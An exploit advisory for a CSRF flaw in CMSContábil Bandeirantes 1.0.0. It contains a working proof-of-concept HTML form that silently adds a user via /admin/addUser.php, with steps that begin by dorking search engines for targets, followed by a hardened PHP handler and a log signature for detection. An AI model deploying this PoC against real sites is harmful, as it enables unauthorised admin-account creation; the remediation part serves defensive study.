======================================================================================================================================
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |
| # Vendor : https://scriptmafia.org/ |
======================================================================================================================================

poc :

[+] Dorking in Google or other search engine.
[+] Go to the line 12.
[+] Set the target site link in the form action, save changes and apply.
[+] Infected file : /admin/addUser.php
[+] Save code as poc.html

<section id="main" class="column" style="height: 680px;">
    <h4 class="alert_info">Necessário preencher todos os campos.</h4>
    <!--<h4 class="alert_warning">A Warning Alert</h4>
    <h4 class="alert_error">An Error Message</h4>
    <h4 class="alert_success">A Success Message</h4>-->
    <article class="module width_full">
        <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
            <header><h3>Adicionar Usuários</h3></header>
            <div class="module_content">
                <fieldset>
                    <label>Nome</label>
                    <input name="nome" id="nome" value="" type="text">
                </fieldset>
                <fieldset>
                    <label>Email</label>
                    <input name="email" id="email" value="" type="text">
                </fieldset>
                <fieldset>
                    <label>Senha</label>
                    <input name="senha" id="senha" value="" type="text">
                </fieldset>
                <div class="clear"></div>
            </div>
            <footer>
                <div class="submit_link">
                    <input id="limpar" name="limpar" value="limpar" type="submit">
                    <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">
                </div>
            </footer>
        </form>
    </article><!-- end of post new article -->
    <div class="spacer"></div>
</section>

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |
=======================================================================================================================================
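The root cause is that addUser.php accepts any POST carrying nome/email/senha, so a page the admin merely visits can create an account. The following hardened handler is an added example written for this advisory, not the vendor's code: it binds a per-session synchronizer token to the form, rejects submissions without it, and marks the session cookie SameSite so a cross-site form post arrives without the session in the first place. Function names and the exact response text are assumptions.

```php
<?php
// Hardened addUser.php (added example, not the vendor's code; names assumed).
// SameSite=Strict means a form auto-submitted from poc.html on another origin
// is sent without the admin's session cookie at all (PHP 7.3+ array syntax).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Strict',
]);
session_start();

// One unpredictable token per session, embedded in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session's copy.
// A forged cross-site form cannot read the victim's session, so it cannot
// supply a matching value.
function csrf_check(array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $sent     = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['cadastrar'])) {
    if (!csrf_check($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Requisição rejeitada: token CSRF ausente ou inválido.');
    }
    // ... the original user-creation logic for nome, email and senha belongs here ...
}
?>
<form action="addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
    <!-- The hidden token is what the forged poc.html form cannot reproduce. -->
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <label>Nome</label><input name="nome" id="nome" type="text">
    <label>Email</label><input name="email" id="email" type="text">
    <label>Senha</label><input name="senha" id="senha" type="password">
    <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">
</form>
```

For detection, a POST to /admin/addUser.php whose Origin or Referer header is absent or names a foreign host is the signature of the PoC above and is worth alerting on in the web server logs.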